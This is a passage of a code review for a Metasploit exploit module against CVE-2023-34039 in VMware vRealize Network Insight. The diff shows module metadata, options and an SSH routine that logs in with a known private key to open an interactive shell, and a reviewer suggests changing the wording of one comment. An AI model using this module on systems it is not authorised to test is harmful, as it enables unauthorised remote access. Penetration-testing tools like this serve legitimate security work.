modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb

```diff
@@ -0,0 +1,190 @@
+                ]
+              }
+            ],
+          ],
+          'Payload' => {
+            'Compat' => {
+              'PayloadType' => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+          },
+          'Author' => [
+            'h00die', # MSF module
+            'SinSinology', # PoC
+            'Harsh Jaiswal (@rootxharsh)', # Discovery
+            'Rahul Maini (@iamnoooob)' # Discovery
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['CVE', '2023-34039'],
+            ['URL', 'https://github.com/sinsinology/CVE-2023-34039'],
+            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],
+            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],
+          ],
+          'DisclosureDate' => '2023-08-29',
+          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+          'DefaultTarget' => 22,
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => []
+          }
+        }
+      )
+    )
+
+    register_options(
+      [
+        # Since we don't include Tcp, we have to register this manually
+        Opt::RHOST(),
+        Opt::RPORT(22)
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptBool.new('STOP_ON_SUCCESS', [ false, 'Stop on successful login', true]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  # helper methods that normally come from Tcp
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def do_login(user, key_data)
+    opt_hash = ssh_client_defaults.merge({
+      auth_methods: ['publickey'],
+      port: rport,
+      key_data: [ key_data ]
+    })
+    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+    begin
+      ssh_socket = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
+      end
+    rescue Rex::ConnectionError
+      return nil
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return nil
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return nil
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      return nil
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return nil
+    end
+
+    if ssh_socket
+
+      # Create a new session from the socket, then dump it.
```

Comment:
```suggestion
      # Create a new session from the socket, then close it.
```

"dump" is a bit confusing, since usually one is "dumping" data, as in "collecting data"